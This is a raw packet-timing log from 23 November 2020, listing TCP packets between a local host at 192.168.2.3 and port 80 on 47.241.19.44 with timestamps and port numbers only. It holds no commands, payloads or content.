Nov 23, 2020 16:11:49.177864075 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.177887917 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.177911043 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.177932024 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.177958012 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.177978039 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.177979946 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.178003073 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.178030968 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.178046942 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.178066015 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.185223103 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.185487032 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.343436956 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.343493938 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.343533993 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.343570948 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.343606949 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.343646049 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.343647003 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.343672037 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.343677998 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.343683004 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.343698978 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.343720913 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.343756914 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.343812943 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.343825102 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.343830109 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.389487028 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.389522076 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.389544010 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.389564991 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.389590025 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.389612913 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.389635086 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.389657021 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.389678001 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.389738083 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.389781952 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.389787912 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.396927118 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.398403883 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.554384947 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.554445982 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.554491043 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.554533005 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.554580927 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.554610014 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.554624081 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.554640055 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.554644108 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.554663897 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.554691076 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.554702997 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.554712057 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.554743052 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.554755926 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.554781914 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.554795980 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.554835081 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.601082087 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.601140022 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.601192951 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.601232052 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.601273060 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.601327896 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.601335049 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.601363897 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.601368904 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.601378918 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.601403952 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.601452112 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.608572960 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.609589100 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.654624939 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.654683113 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.654932976 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.663237095 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.665612936 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.765819073 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.765844107 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.765861034 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.765877008 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.765892982 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.765908003 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.765925884 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.765938044 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.765942097 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.765978098 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.765984058 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.807558060 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.807593107 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.807806969 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.812222004 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.812251091 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.812268019 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.812284946 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.812300920 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.812316895 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.812331915 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.812436104 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.812479973 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.819555998 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.819736004 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.855016947 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.855052948 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.855076075 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.855173111 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.855218887 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.866427898 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.869633913 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.977360010 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.977444887 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.977488041 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.977526903 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.977564096 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.977602959 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.977638960 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.977657080 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.977686882 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:49.977689028 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.977694988 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.977699041 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:49.980355978 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.018922091 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.018971920 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.019154072 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.021595955 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.023806095 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.023844957 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.023874044 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.023899078 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.023925066 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.023951054 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.023971081 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.023976088 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.024014950 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.024022102 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.024027109 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.024030924 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.030586958 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.030757904 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.066728115 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.066781998 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.066934109 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.066984892 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.072597980 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.072776079 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.107197046 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.107224941 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.107413054 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.107439995 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.121004105 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.121134996 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.189023018 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.189083099 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.189122915 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.189160109 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.189198017 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.189202070 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.189235926 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.189241886 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.189244986 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.189245939 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.189250946 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.189285994 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.189312935 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.189323902 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.189336061 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.189379930 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.230685949 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.230751038 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.230782032 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.230794907 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.230853081 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.230859995 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.232326984 CET	49724	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.317298889 CET	49723	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:50.496952057 CET	80	49724	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:50.627120018 CET	80	49723	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:51.104326010 CET	80	49723	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:51.104374886 CET	80	49723	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:51.104571104 CET	49723	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:51.106571913 CET	49723	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:51.374878883 CET	80	49723	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:52.570712090 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:52.572060108 CET	49727	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:52.828969002 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:52.829174995 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:52.845490932 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:52.856199980 CET	80	49727	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:52.856302977 CET	49727	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:53.147273064 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:53.885571957 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:53.885632038 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:53.885662079 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:53.885691881 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:53.885730028 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:53.885770082 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:53.885795116 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:53.885848999 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:53.928219080 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:53.928286076 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:53.928314924 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:53.928344965 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:53.928457975 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:53.929856062 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.143841028 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.143863916 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.143879890 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.143896103 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.143922091 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.143965006 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.147598028 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.147618055 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.147635937 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.147650957 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.147665977 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.147670031 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.147682905 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.147700071 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.147708893 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.147716045 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.147743940 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.147778988 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.186491966 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.186517000 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.186533928 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.186551094 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.186569929 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.186615944 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.186623096 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.187791109 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.187838078 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.310147047 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.310206890 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.310237885 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.310275078 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.352427006 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.352566957 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.401984930 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.402034044 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.402127981 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.402199030 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405239105 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405281067 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405318975 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405338049 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405359983 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405366898 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405375957 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405426979 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405438900 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405478954 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405495882 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405515909 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405531883 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405555010 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405572891 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405595064 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405616045 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405632019 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405649900 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405673981 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405689955 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405711889 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405728102 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405759096 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.405767918 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.405827999 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.521605968 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.521652937 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.521691084 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.521713972 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.521738052 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.521766901 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.521774054 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.521781921 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.521796942 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.521821976 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.521842003 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.521863937 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.521879911 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.521903992 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.521919966 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.521939993 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.521960020 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.521997929 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.564449072 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.564498901 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.564538002 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.564577103 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.564596891 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.564615011 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.564636946 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.564663887 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.564686060 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.564707994 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.564728022 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.564745903 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.564765930 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.564800978 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.568134069 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.568231106 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.734014988 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.734065056 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.734088898 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.734112978 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.734143972 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.734174967 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.734204054 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.734232903 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.734239101 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.734262943 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.734313965 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.734323025 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.734328032 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.734332085 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.734338045 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.776657104 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.776716948 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.776746988 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.776777029 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.776807070 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.776845932 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.776885033 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.776923895 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.776949883 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.776962042 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.777019024 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.777031898 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.777038097 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.777043104 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.780030012 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.780190945 CET	49726	80	192.168.2.3	47.241.19.44
Nov 23, 2020 16:11:54.946002007 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.946023941 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.946036100 CET	80	49726	47.241.19.44	192.168.2.3
Nov 23, 2020 16:11:54.946048975 CET	80	49726	47.241.19.44	192.168.2.3
